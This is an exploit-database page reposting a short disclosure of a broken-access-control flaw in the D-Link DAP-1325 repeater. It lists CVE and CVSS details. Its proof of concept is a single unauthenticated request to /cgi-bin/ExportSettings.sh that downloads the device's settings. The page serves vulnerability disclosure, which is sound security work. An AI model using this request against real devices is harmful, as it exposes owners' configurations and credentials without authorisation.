Advertisement






D-Link DAP-1325 Broken Access Control

CVE Category Price Severity
CVE-2021-24209 CWE-285 $5000 High
Author Risk Exploitation Type Date
Anonymous Critical Remote 2023-07-06
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070017

Below is a copy:

D-Link DAP-1325 Broken Access Control
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1 
# Firmware version: 1.01
# Tested on:All Platforms


1) Description

Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Add the payload to URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.